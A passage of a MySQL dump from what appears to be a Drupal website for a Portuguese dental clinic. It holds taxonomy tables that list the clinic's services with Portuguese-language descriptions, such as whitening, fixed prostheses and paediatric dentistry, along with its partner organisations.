  `field_logotipo_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `field_logotipo_width` int(10) unsigned DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `field_logotipo_height` int(10) unsigned DEFAULT NULL COMMENT 'The height of the image in pixels.',
  PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  KEY `bundle` (`bundle`),
  KEY `revision_id` (`revision_id`),
  KEY `field_logotipo_target_id` (`field_logotipo_target_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Data storage for taxonomy_term field field_logotipo.';

--
-- Dumping data for table `taxonomy_term__field_logotipo`
--

INSERT INTO `taxonomy_term__field_logotipo` VALUES ('parcerias',0,8,8,'pt-pt',0,40,'','',350,350),('parcerias',0,9,9,'pt-pt',0,92,'','',362,120),('parcerias',0,10,10,'pt-pt',0,42,'','',170,207),('parcerias',0,11,11,'pt-pt',0,43,'','',247,306),('parcerias',0,12,12,'pt-pt',0,95,'','',1200,630),('parcerias',0,13,13,'pt-pt',0,94,'','',957,484),('parcerias',0,14,14,'pt-pt',0,47,'','',54,96),('parcerias',0,15,15,'pt-pt',0,48,'','',260,163),('parcerias',0,16,16,'pt-pt',0,49,'','',347,269),('parcerias',0,18,18,'pt-pt',0,90,'','',3508,2480),('parcerias',0,19,19,'pt-pt',0,91,'','',496,496),('parcerias',0,20,20,'pt-pt',0,93,'','',1750,457);

--
-- Table structure for table `taxonomy_term__parent`
--

CREATE TABLE `taxonomy_term__parent` (
  `bundle` varchar(128) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `parent_target_id` int(10) unsigned NOT NULL COMMENT 'The ID of the target entity.',
  PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  KEY `revision_id` (`revision_id`),
  KEY `parent_target_id` (`parent_target_id`),
  KEY `bundle_delta_target_id` (`bundle`,`delta`,`parent_target_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Data storage for taxonomy_term field parent.';

--
-- Dumping data for table `taxonomy_term__parent`
--

INSERT INTO `taxonomy_term__parent` VALUES ('servicos',0,1,1,'pt-pt',0,0),('servicos',0,2,2,'pt-pt',0,0),('servicos',0,3,3,'pt-pt',0,0),('servicos',0,4,4,'pt-pt',0,0),('servicos',0,5,5,'pt-pt',0,0),('servicos',0,6,6,'pt-pt',0,0),('servicos',0,7,7,'pt-pt',0,0),('parcerias',0,8,8,'pt-pt',0,0),('parcerias',0,9,9,'pt-pt',0,0),('parcerias',0,10,10,'pt-pt',0,0),('parcerias',0,11,11,'pt-pt',0,0),('parcerias',0,12,12,'pt-pt',0,0),('parcerias',0,13,13,'pt-pt',0,0),('parcerias',0,14,14,'pt-pt',0,0),('parcerias',0,15,15,'pt-pt',0,0),('parcerias',0,16,16,'pt-pt',0,0),('parcerias',0,18,18,'pt-pt',0,0),('parcerias',0,19,19,'pt-pt',0,0),('parcerias',0,20,20,'pt-pt',0,0),('servicos',0,21,21,'pt-pt',0,0);

--
-- Table structure for table `taxonomy_term_data`
--

CREATE TABLE `taxonomy_term_data` (
  `tid` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `revision_id` int(10) unsigned DEFAULT NULL,
  `vid` varchar(32) CHARACTER SET ascii NOT NULL COMMENT 'The ID of the target entity.',
  `uuid` varchar(128) CHARACTER SET ascii NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii NOT NULL,
  PRIMARY KEY (`tid`),
  UNIQUE KEY `taxonomy_term_field__uuid__value` (`uuid`),
  UNIQUE KEY `taxonomy_term__revision_id` (`revision_id`),
  KEY `taxonomy_term_field__vid__target_id` (`vid`)
) ENGINE=InnoDB AUTO_INCREMENT=22 DEFAULT CHARSET=utf8mb4 COMMENT='The base table for taxonomy_term entities.';

--
-- Dumping data for table `taxonomy_term_data`
--

INSERT INTO `taxonomy_term_data` VALUES (1,1,'servicos','6626b6ad-9035-498a-b4c3-fd280dc191be','pt-pt'),(2,2,'servicos','856960bc-6018-4faf-b096-281f4fa67e1e','pt-pt'),(3,3,'servicos','59d029db-868a-43c8-9208-43bb647d3b18','pt-pt'),(4,4,'servicos','24b97d56-c14d-4fc5-9fbb-fea5df2e3941','pt-pt'),(5,5,'servicos','6f3da0f4-1829-4a71-b6f0-eaf9b517bf48','pt-pt'),(6,6,'servicos','706f198c-ad2c-4274-b7d1-3b3d195ba781','pt-pt'),(7,7,'servicos','c630b9ea-f3a2-49a0-ad75-9199b1752d46','pt-pt'),(8,8,'parcerias','2e6ed98a-9b45-4165-bd59-3a5e5ce7f41a','pt-pt'),(9,9,'parcerias','64935dfe-abd0-40a6-a093-712a060bccf4','pt-pt'),(10,10,'parcerias','6ad412d1-7539-4a45-9c74-de42fcef9f51','pt-pt'),(11,11,'parcerias','f839fd56-6217-49e0-8c0e-db09eb641c39','pt-pt'),(12,12,'parcerias','a511899d-4805-4b96-85f5-ed5f50f2d21a','pt-pt'),(13,13,'parcerias','f0af8bc7-4621-4090-b0a6-1be912cc301b','pt-pt'),(14,14,'parcerias','b92ac8e6-3028-445f-a68f-10791ec753ed','pt-pt'),(15,15,'parcerias','44463e23-381e-4b1f-a60a-c878a17860de','pt-pt'),(16,16,'parcerias','014e11a2-e9cb-4115-a62c-0df5d08a8ec8','pt-pt'),(18,18,'parcerias','53d5fea5-7b61-48aa-81d8-a0143bc0fbbe','pt-pt'),(19,19,'parcerias','3880b52b-2cfb-4b2a-825a-04ce34301f46','pt-pt'),(20,20,'parcerias','761007df-d3cb-4be7-81ab-929732f6659e','pt-pt'),(21,21,'servicos','5e867fa8-1f3e-4097-b302-02740b8fa4b1','pt-pt');

--
-- Table structure for table `taxonomy_term_field_data`
--

CREATE TABLE `taxonomy_term_field_data` (
  `tid` int(10) unsigned NOT NULL,
  `revision_id` int(10) unsigned NOT NULL,
  `vid` varchar(32) CHARACTER SET ascii NOT NULL COMMENT 'The ID of the target entity.',
  `langcode` varchar(12) CHARACTER SET ascii NOT NULL,
  `status` tinyint(4) NOT NULL,
  `name` varchar(255) NOT NULL,
  `description__value` longtext,
  `description__format` varchar(255) CHARACTER SET ascii DEFAULT NULL,
  `weight` int(11) NOT NULL,
  `changed` int(11) DEFAULT NULL,
  `default_langcode` tinyint(4) NOT NULL,
  `revision_translation_affected` tinyint(4) DEFAULT NULL,
  PRIMARY KEY (`tid`,`langcode`),
  KEY `taxonomy_term__id__default_langcode__langcode` (`tid`,`default_langcode`,`langcode`),
  KEY `taxonomy_term__revision_id` (`revision_id`),
  KEY `taxonomy_term_field__name` (`name`(191)),
  KEY `taxonomy_term__status_vid` (`status`,`vid`,`tid`),
  KEY `taxonomy_term__tree` (`vid`,`weight`,`name`(191)),
  KEY `taxonomy_term__vid_name` (`vid`,`name`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='The data table for taxonomy_term entities.';

--
-- Dumping data for table `taxonomy_term_field_data`
--

INSERT INTO `taxonomy_term_field_data` VALUES (1,1,'servicos','pt-pt',1,'Implantologia','<p class=\"text-align-justify\">A&nbsp;<strong>prótese dentária</strong>&nbsp;consiste na&nbsp;reposição e reconstituição de tecidos bucais e dentes perdidos, com o objectivo de restaurar e manter a forma, função, aparência e saúde da nossa boca.</p>\r\n\r\n<p class=\"text-align-justify\">A \"prótese dentária\" &nbsp;é também utilizada para substituir a função original de dentes que por degradação ou acidente se tenham&nbsp;perdido.</p>\r\n\r\n<p class=\"text-align-justify\">Recentemente encontramos no mercado próteses modernas produzidas sobre implantes como overdentures, próteses fixas livres de metal (metalfree) e próteses protocolo.</p>\r\n\r\n<p class=\"text-align-justify\">Na Clínica Dentária do Castelo somos especializada em reparações. Prestamos vários tratamentos dentários,&nbsp;usando os materiais e equipamentos mais recentes e as mais inovadoras técnicas de ortodontia.</p>\r\n\r\n<p class=\"text-align-justify\">O nosso objectivo é esclarecer os nossos cliente de todas as dúvidas que surgem quando se pensa ou se tem a necessidade de colocar implantes dentários ou próteses dentárias. Garantimos um serviço de acompanhamento especializado e cuidado.</p>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<p class=\"text-align-center\"><img alt=\".\" data-entity-type=\"file\" data-entity-uuid=\"34fb0cea-8382-4b12-b63f-bcc54bebb3ca\" height=\"404\" src=\"/clidentcastelo/public/sites/default/files/inline-images/3ca955aa-8574-4d7c-9103-75d84a267918_LARGE.jpg\" width=\"541\" />&nbsp; &nbsp; &nbsp;&nbsp;<img alt=\".\" data-entity-type=\"file\" data-entity-uuid=\"ae080749-d4cf-472b-b788-bc6de331d5c2\" height=\"406\" src=\"/clidentcastelo/public/sites/default/files/inline-images/b4c63ac9-a015-4156-83f4-a55843b21819_LARGE.jpg\" width=\"543\" />&nbsp; &nbsp; &nbsp;</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<h2>&nbsp;</h2>\r\n\r\n<hr />\r\n<h2><strong><span>As nossas próteses</span></strong></h2>\r\n\r\n<h3 class=\"text-align-center\">Próteses Dentárias Removíveis</h3>\r\n\r\n<p class=\"text-align-center\"><a name=\"m2242433\"></a></p>\r\n\r\n<p class=\"text-align-center\"><iframe allowtransparency=\"true\" frameborder=\"0\" height=\"360\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" src=\"http://www.pai.pt/ms/widgets.html?siteId=71612&amp;customerId=87350378&amp;moduleId=50903068\" width=\"900\"></iframe></p>\r\n\r\n<p class=\"text-align-center\"><a name=\"m2242435\"></a></p>\r\n\r\n<p class=\"text-align-center\">&nbsp;</p>\r\n\r\n<h3 class=\"text-align-center\">Próteses Dentárias Fixas - Implantes Inclinados</h3>\r\n\r\n<p class=\"text-align-center\"><a name=\"m2242436\"></a></p>\r\n\r\n<p class=\"text-align-center\"><iframe allowtransparency=\"true\" frameborder=\"0\" height=\"360\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" src=\"http://www.pai.pt/ms/widgets.html?siteId=71612&amp;customerId=87350378&amp;moduleId=50903071\" width=\"900\"></iframe></p>\r\n\r\n<p class=\"text-align-center\"><a name=\"m2242438\"></a></p>\r\n\r\n<p class=\"text-align-center\">&nbsp;</p>\r\n\r\n<h3 class=\"text-align-center\">Próteses Dentárias novo Tratamento</h3>\r\n\r\n<p class=\"text-align-center\"><a name=\"m2242439\"></a></p>\r\n\r\n<p class=\"text-align-center\"><iframe allowtransparency=\"true\" frameborder=\"0\" height=\"360\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" src=\"http://www.pai.pt/ms/widgets.html?siteId=71612&amp;customerId=87350378&amp;moduleId=50903070\" width=\"900\"></iframe></p>\r\n\r\n<p class=\"text-align-center\"><a name=\"m2242415\"></a></p>\r\n\r\n<p class=\"text-align-center\">&nbsp;</p>\r\n\r\n<h3 class=\"text-align-center\">Novo Sistema de Fixação de Próteses Dentárias</h3>\r\n\r\n<p class=\"text-align-center\"><a name=\"m2242416\"></a></p>\r\n\r\n<p class=\"text-align-center\"><iframe allowtransparency=\"true\" frameborder=\"0\" height=\"360\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" src=\"http://www.pai.pt/ms/widgets.html?siteId=71612&amp;customerId=87350378&amp;moduleId=50903073\" width=\"900\"></iframe></p>\r\n\r\n<p class=\"text-align-center\"><a name=\"m2242418\"></a></p>\r\n\r\n<p class=\"text-align-center\">&nbsp;</p>\r\n\r\n<h3 class=\"text-align-center\">Próteses Dentárias Removíveis com Barra</h3>\r\n\r\n<h3 class=\"text-align-center\"><a name=\"m2242419\"></a></h3>\r\n\r\n<h3 class=\"text-align-center\"><iframe allowtransparency=\"true\" frameborder=\"0\" height=\"360\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" src=\"http://www.pai.pt/ms/widgets.html?siteId=71612&amp;customerId=87350378&amp;moduleId=50903074\" width=\"900\"></iframe></h3>\r\n\r\n<h3 class=\"text-align-center\"><a name=\"m2242421\"></a></h3>\r\n\r\n<h3 class=\"text-align-center\">&nbsp;</h3>\r\n\r\n<h3 class=\"text-align-center\">Próteses Dentárias Fixas Implantes Retos</h3>\r\n\r\n<h3 class=\"text-align-center\"><a name=\"m2242422\"></a></h3>\r\n\r\n<h3 class=\"text-align-center\"><iframe allowtransparency=\"true\" frameborder=\"0\" height=\"360\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" src=\"http://www.pai.pt/ms/widgets.html?siteId=71612&amp;customerId=87350378&amp;moduleId=50903066\" width=\"900\"></iframe></h3>\r\n\r\n<h3 class=\"text-align-center\"><a name=\"m2242424\"></a></h3>\r\n\r\n<h3 class=\"text-align-center\">&nbsp;</h3>\r\n\r\n<h3 class=\"text-align-center\">Sistema único de Fixação Dentária</h3>\r\n\r\n<h3 class=\"text-align-center\"><a name=\"m2242425\"></a></h3>\r\n\r\n<h3 class=\"text-align-center\"><iframe allowtransparency=\"true\" frameborder=\"0\" height=\"360\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" src=\"http://www.pai.pt/ms/widgets.html?siteId=71612&amp;customerId=87350378&amp;moduleId=50903065\" width=\"900\"></iframe></h3>\r\n\r\n<h3 class=\"text-align-center\"><a name=\"m2242440\"></a></h3>\r\n\r\n<h3 class=\"text-align-center\">&nbsp;</h3>\r\n','full_html',4,1579626211,1,1),(2,2,'servicos','pt-pt',1,'Branqueamento dentário','<p class=\"text-align-justify\">Em geral, qualquer pessoa, com idade superior a 18 anos,&nbsp;pode efetuar um branqueamento dentário e sempre que se verifique um bom estado de saúde oral. Caso existam alguns problemas dentários tais como&nbsp;cáries, desgastes, sensibilidade dentária ou&nbsp;outros, pode haver a necessidade de os tratar previamente.&nbsp;Deve, por isso, consultar o seu médico dentista, para em conjunto avaliarem o momento certo para realizar o branqueamento dentário.</p>\r\n\r\n<p class=\"text-align-justify\">É fundamental que, independentemente da técnica a utilizar,&nbsp;este procedimento seja efetuado pelo seu médico dentista,&nbsp;sempre com base na melhor relação eficácia/segurança.<br />\r\n&nbsp;</p>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<p class=\"text-align-center\"><iframe allow=\";\" allowfullscreen=\"\" frameborder=\"0\" height=\"360\" src=\"https://www.youtube.com/embed/VrlO--UypVQ\" width=\"640\"></iframe></p>\r\n\r\n<p class=\"text-align-center\">&nbsp;</p>\r\n\r\n<p class=\"text-align-justify\">Este procedimento pode causar alguns&nbsp;efeitos secundários, quer a nível dentário quer&nbsp;a nível das gengivas, devido à&nbsp;concentração dos&nbsp;produtos, a forma como são aplicados e as condições de cada paciente. O que ocorre com mais frequência&nbsp;são a sensibilidade dentária e&nbsp;desconforto gengival que normalmente desaparece com a&nbsp;interrupção do tratamento.&nbsp;O seu médico dentista&nbsp;pode prevenir e controlar clinicamente estas condições.</p>\r\n\r\n<p class=\"text-align-justify\">Nos casos em que os pacientes&nbsp;possuam restaurações estéticas e próteses dentárias poderão ter a necessidade de substituir ou reparar as mesmas no final do tratamento de branqueamento, de modo a ajustar a cor e garantir a&nbsp;integridade das restaurações dentárias, visto&nbsp;que os produtos&nbsp;de branqueamento não atuam na cor dos materiais que as compõem.</p>\r\n\r\n<p class=\"text-align-justify\">Este tratamento, sempre&nbsp;supervisionado&nbsp;pelo médico dentista, pode&nbsp;ser realizado&nbsp;de duas formas. Por um lado pode ser&nbsp;aplicado o material branqueador em casa (“tratamento ambulatório”), utilizando&nbsp;geralmente os produtos de menor<br />\r\nconcentração, por períodos variáveis (desde 1 a 8 horas diárias), durante vários dias ou semanas ou, por outro lado, pode optar pela&nbsp;aplicação no consultório, com o auxílio de luzes.&nbsp;O que exerce um efeito branqueador são os produtos químicos&nbsp;aplicados em simultâneo. As luzes são usadas como forma de&nbsp;acelerar a reação química dos produtos, na tentativa de tornar o&nbsp;processo de branqueamento mais rápido.</p>\r\n\r\n<p class=\"text-align-justify\">Se tiver alguma&nbsp;dúvida&nbsp;acerca do tratamento que vai efetuar não tenha não hesite em entrar em contacto connosco ou colocar as suas questões durante a sua consulta.</p>\r\n\r\n<p class=\"text-align-justify\"><br />\r\n&nbsp;</p>\r\n','full_html',7,1579198070,1,1),(3,3,'servicos','pt-pt',1,'Próteses Fixas','<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<p class=\"text-align-justify\">A prótese fixa é a uma boa solução nos casos em que faltam poucos dentes, tanto pelo conforto como pela estética.&nbsp;</p>\r\n\r\n<p class=\"text-align-justify\"><span><span><span>As próteses fixas, que podem ser coroas ou pontes, têm como objetivo criar soluções que se aproximem o mais possível à nossa dentição natural, sendo indicadas para</span></span></span>:</p>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<ul>\r\n	<li class=\"text-align-justify\">Substituir uma restauração quando existe pouca&nbsp;estrutura do dente natural</li>\r\n	<li class=\"text-align-justify\">Proteger um dente enfraquecido&nbsp;</li>\r\n	<li class=\"text-align-justify\">Aumentar a retenção e suporte de uma prótese removível esquelética</li>\r\n	<li class=\"text-align-justify\">Recobrir um dente com alteração da cor ou forma</li>\r\n	<li class=\"text-align-justify\">Proteger dentes desvitalizados em que a estrutura dentária remanescente está fragilizada</li>\r\n	<li class=\"text-align-justify\">Substituir um dente perdido, colocando-as sobre implantes dentários</li>\r\n</ul>\r\n\r\n<p class=\"text-align-justify\"><span><span><span>Uma prótese fixa consiste na restauração total ou parcial da coroa de um dente através de uma prótese que é colocada sobre o dente natural previamente preparado para o efeito ou sobre implantes dentários, não podendo ser removida pelo paciente. </span></span></span></p>\r\n\r\n<p class=\"text-align-justify\"><span><span><span>A prótese fixa é a uma boa solução nos casos em que faltam poucos dentes, tanto pelo conforto como pela estética.</span></span></span></p>\r\n\r\n<h3 class=\"text-align-justify\"><span><span><span>Coroa ou Ponte</span></span></span></h3>\r\n\r\n<p class=\"text-align-justify\"><span><span><span>As coroas são indicadas nos casos em que é necessário conferir maior resistência e durabilidade a dentes danificados, mas também, em casos em que o objectivo é melhorar esteticamente o formato e alinhamento dos dentes. Uma coroa pode ainda ser colocada sobre um implante dentário no caso de um dente perdido.</span></span></span></p>\r\n\r\n<p class=\"text-align-justify\">As pontes são aconselhadas em casos em que é necessário substituir um ou mais dentes ausentes e são, no fundo,&nbsp;uma sequência de coroas, todas unidas.</p>\r\n\r\n<p class=\"text-align-justify\"><o:p></o:p></p>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<p class=\"text-align-justify\">Estes tratamentos de reabilitação fixa têm uma período de duração variável, podendo chegar a vários meses. Dependendo da extensão do tratamento, poderão ser necessárias várias consultas, para além do tempo necessário à execução das próteses num laboratório especializado.</p>\r\n\r\n<p class=\"text-align-justify\"><br />\r\nPara garantir a durabilidade das próteses fixas é fundamental manter uma boa higiene dentária, tal como com a dentição natural, e visitar regularmente o dentista para controlo e limpeza.</p>\r\n','full_html',3,1579626099,1,1),(4,4,'servicos','pt-pt',1,'Ortodontia',NULL,NULL,5,1565602752,1,1),(5,5,'servicos','pt-pt',1,'Odontopediatria','<p class=\"text-align-justify\"><span><span>A criança, enquanto ser único, depende física e emocionalmente de um adulto, apresentando etapas decisivas de desenvolvimento psicomotor, assim como particularidades anatómicas, fisiológicas e comportamentais. Desta forma, as patologias sistémicas e orais merecem uma abordagem distinta da de um adulto. Neste sentido, surge a odontopediatria, a área da Medicina Dentária que se dedica à saúde oral de bebés, crianças e adolescentes (0-17 anos), onde se pressupõe a intervenção precoce e terapêutica, através da realização de tratamentos preventivos e curativos, para que a criança mantenha uma boca sã, estética e funcional, até à idade adulta.</span></span></p>\r\n\r\n<p class=\"text-align-justify\"><span><span>É de extrema importância que os dentes de leite se mantenham tratados e livres de focos de infeção tal como os dentes definitivos, pois alguns mantêm-se em boca até aos 12 anos e são fundamentais para o normal desenvolvimento da mastigação, deglutição, fonética, estética e respiração, assim como na manutenção do espaço para os definitivos que depois o ocuparão.</span></span></p>\r\n\r\n<p class=\"text-align-justify\"><span><span>Os objetivos da consulta de odontopediatria são vários:</span></span></p>\r\n\r\n<ul>\r\n	<li class=\"text-align-justify\"><span><span>prevenção: realizar o exame oral e diagnóstico precoces e fornecer orientações aos pais;</span></span></li>\r\n	<li class=\"text-align-justify\"><span><span>instrução e motivação para correta alimentação e higiene oral;</span></span></li>\r\n	<li class=\"text-align-justify\"><span><span>realização de aplicações tópicas de flúor: permite a remineralização do esmalte, ajudando a prevenir o aparecimento de cárie ou a mantê-la inativa;</span></span></li>\r\n	<li class=\"text-align-justify\"><span><span>realização de tratamentos preventivos: visam evitar o aparecimento de lesões dentárias e de desenvolvimento orofacial (ex.: selantes de fissura);</span></span></li>\r\n	<li class=\"text-align-justify\"><span><span>realização de tratamentos curativos: visam tratar lesões dentárias já existentes (ex.: tratamento de cárie em dentição decídua e mista, exodontia de dentes de leite);</span></span></li>\r\n	<li class=\"text-align-justify\"><span><span>realizar tratamentos intercetivos: visam reduzir a severidade ou mesmo eliminar hábitos nocivos, que causam problemas na saúde oral e desenvolvimento facial, através do trabalho em conjunto com a terapia da fala e ortodontia (ex.: extrações dentárias programadas, eliminar contactos prematuros);</span></span></li>\r\n</ul>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<h3 class=\"text-align-justify\"><strong><span><span>Consulta no Bebé</span></span></strong></h3>\r\n\r\n<p class=\"text-align-justify\"><span><span>É frequente os pais perguntarem qual é a idade em que se deve ter a primeira consulta de Medicina Dentária. A resposta é a partir do momento em que surge o primeiro dente na cavidade oral, por volta dos 6 meses de vida. Sendo assim, o bebé já pode ir ao dentista, de forma a que se possa fazer aconselhamento sobre alimentação, higiene oral e flúor, dar indicações acerca dos efeitos nocivos que a chupeta e o biberão poderão trazer para os seus dentinhos e crescimento orofacial, assim como informar qual o tipo de pasta, escova e técnica de escovagem adequados e sensibilizar para a deteção de “lesões de mancha branca”. É uma consulta essencialmente preventiva, cujo principal objetivo é observar e alertar os pais para atitudes preventivas e onde os mais pequenos podem ter um contacto precoce com os instrumentos e o ambiente do consultório de Medicina Dentária. </span></span></p>\r\n\r\n<p class=\"text-align-justify\"><span><span>Convém referir, ainda, que a gengiva do bebé também deve ser higienizada pelos pais, através do auxílio de uma compressa humedecida com soro ou água. A pasta de dentes, tal como o próprio nome indica, só deverá ser utilizada a partir do momento em que aparece o 1º dente.</span></span></p>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<h3 class=\"text-align-justify\"><strong><span><span>Consulta na criança</span></span></strong></h3>\r\n\r\n<p class=\"text-align-justify\"><span><span>A dentição de leite ou decídua é composta por 20 dentes e fica completa por volta dos 2 anos e meio de idade e é importante que a criança comece a ter hábitos de higiene oral e consultas regulares no dentista, pois, se há dentes na boca, significa que pode haver formação de cárie nos mesmos.</span></span></p>\r\n\r\n<p class=\"text-align-justify\"><span><span>Se a primeira consulta se der quando há dor ou cárie, conquistar a confiança da criança é mais complicado, daí a importância de que a primeira consulta deve ser encarada como uma experiência positiva com os instrumentos dentários, como rotina e prevenção, ao invés da ida pela preocupação do facto de a criança andar com queixas de dor nos dentes ou porque apareceu uma “borbulhinha” no dente que tem um buraco preto. Neste caso, a primeira consulta ao invés de ser uma consulta preventiva, passa a ser uma experiência um pouco mais temida e invasiva. É também muito importante que a criança, em casa, mantenha bons e regulares hábitos de higiene oral e que o faça em conjunto com os pais, pois estes são encarados por elas como “super-heróis”, o seu principal exemplo, e gostam de fazer tudo o que os seus pais fazem. Também é muito importante que a criança não traga uma ideia pré-concebida acerca do dentista, por conversas que escutou, mas sim deixá-la ter a sua própria experiência, pois o médico dentista saberá qual a melhor forma de o abordar, fazendo tudo parecer mais simples.</span></span></p>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<h3 class=\"text-align-justify\"><strong><span><span>Consulta no adolescente</span></span></strong></h3>\r\n\r\n<p class=\"text-align-justify\"><span><span>Entre os 5-6 anos aparecem os primeiros molares definitivos, atrás dos molares de leite, sem queda de nenhum dente permanente (pode passar despercebido), iniciando a fase de dentição mista, isto é, há presença simultânea de dentes de leite e de dentes definitivos na cavidade oral.&nbsp; Por volta dos 14 anos, a dentição definitiva fica completa, ou seja, todos os dentes de leite foram expulsos e só existem dentes definitivos (à exceção dos dentes do siso), que devem ser mantidos saudáveis até ao final da vida.</span></span></p>\r\n\r\n<p class=\"text-align-justify\"><span><span>É importante fazer consultas regulares de controlo, profilaxia e aplicações tópicas de flúor, tratamentos curativos na fase mais precoce possível, avaliar a necessidade de auxiliar a expulsão dos dentes de leite (pois nem sempre conseguem sair por eles próprios), de realizar os selantes de fissura e, também, de avaliar o crescimento facial e a orientação dentária, de forma a observar se haverá necessidade de utilizar aparelho ortodôntico.</span></span></p>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<p class=\"text-align-justify\"><span><span>É importante relembrar que um dente de leite com cárie é um foco infecioso e pode afetar a formação dos dentes definitivos e a saúde em geral.</span></span></p>\r\n\r\n<p class=\"text-align-justify\"><span><span>Se a criança começar a ser seguida numa idade muito precoce, consegue manter estes hábitos durante toda a sua vida, pois adquire-os como seus e tudo se tornará mais fácil!</span></span></p>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n','full_html',6,1579198070,1,1),(6,6,'servicos','pt-pt',1,'Restaurações Estéticas',NULL,NULL,1,1579198070,1,1),(7,7,'servicos','pt-pt',1,'Higiene oral','<p>A higiene oral é um dos principais cuidados a ter para uma boa saúde oral.<br />\r\nEstes cuidados devem iniciar-se desde a infância ou até mesmo antes, com conselhos pré-natais transmitidos aos pais, isto porque é fundamental que acção se baseie numa educação preventiva.</p>\r\n\r\n<h3><br />\r\nComo escovar os dentes</h3>\r\n\r\n<p>Deve&nbsp;lavar os dentes 3 vezes ao dia, durante&nbsp;pelo menos 2 minutos, depois das refeições e ao deitar.</p>\r\n\r\n<p>A escolha da escova mais indicada também é importante, aconselhe-se com o seu dentista, não esquecendo que esta deve ser trocada de 3 em 3 meses.</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<p><iframe allow=\";\" allowfullscreen=\"\" frameborder=\"0\" height=\"360\" src=\"https://www.youtube.com/embed/Ot2Cwtqwht0\" width=\"640\"></iframe></p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<p>&nbsp;</p>\r\n','full_html',0,1580485541,1,1),(8,8,'parcerias','pt-pt',1,'Sporting Clube de Braga',NULL,NULL,3,1565972485,1,1),(9,9,'parcerias','pt-pt',1,'Serviço Médico Permanente SMP',NULL,NULL,7,1565972485,1,1),(10,10,'parcerias','pt-pt',1,'Sindicato dos Trabalhadores das Indústrias Transformadoras, Energia e Actividades do Ambiente do Norte – SITE NORTE',NULL,NULL,8,1571823909,1,1),(11,11,'parcerias','pt-pt',1,'Sindicato dos Trabalhadores do Comércio, Escritórios e Serviços do Minho - Cesminho',NULL,NULL,10,1571823972,1,1),(12,12,'parcerias','pt-pt',1,'Associação Mutualista Montepio',NULL,NULL,0,1565972342,1,1),(13,13,'parcerias','pt-pt',1,'DentyRed',NULL,NULL,5,1565972485,1,1),(14,14,'parcerias','pt-pt',1,'Federação Nacional de Professores - Sindicato de Professores do Norte',NULL,NULL,9,1571821042,1,1),(15,15,'parcerias','pt-pt',1,'Clube Recreativo do Pessoal dos TUB',NULL,NULL,6,1565972485,1,1),(16,16,'parcerias','pt-pt',1,'Cheque dentista',NULL,NULL,2,1565972485,1,1),(18,18,'parcerias','pt-pt',1,'Medicare',NULL,NULL,4,1565972485,1,1),(19,19,'parcerias','pt-pt',1,'Liga dos Combatentes',NULL,NULL,11,1565972928,1,1),(20,20,'parcerias','pt-pt',1,'Automóvel Club de Portugal',NULL,NULL,1,1565972485,1,1),(21,21,'servicos','pt-pt',1,'Próteses Removíveis',NULL,NULL,2,1579256185,1,1);

--
-- Table structure for table `taxonomy_term_field_revision`
--

CREATE TABLE `taxonomy_term_field_revision` (
  `tid` int(10) unsigned NOT NULL,
  `revision_id` int(10) unsigned NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii NOT NULL,
  `status` tinyint(4) NOT NULL,
  `name` varchar(255) DEFAULT NULL,
  `description__value` longtext,
  `description__format` varchar(255) CHARACTER SET ascii DEFAULT NULL,
  `changed` int(11) DEFAULT NULL,
  `default_langcode` tinyint(4) NOT NULL,
  `revision_translation_affected` tinyint(4) DEFAULT NULL,
  PRIMARY KEY (`revision_id`,`langcode`),
  KEY `taxonomy_term__id__default_langcode__langcode` (`tid`,`default_langcode`,`langcode`),
  KEY `taxonomy_term_field__description__format` (`description__format`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='The revision data table for taxonomy_term entities.';

--
-- Dumping data for table `taxonomy_term_field_revision`
--

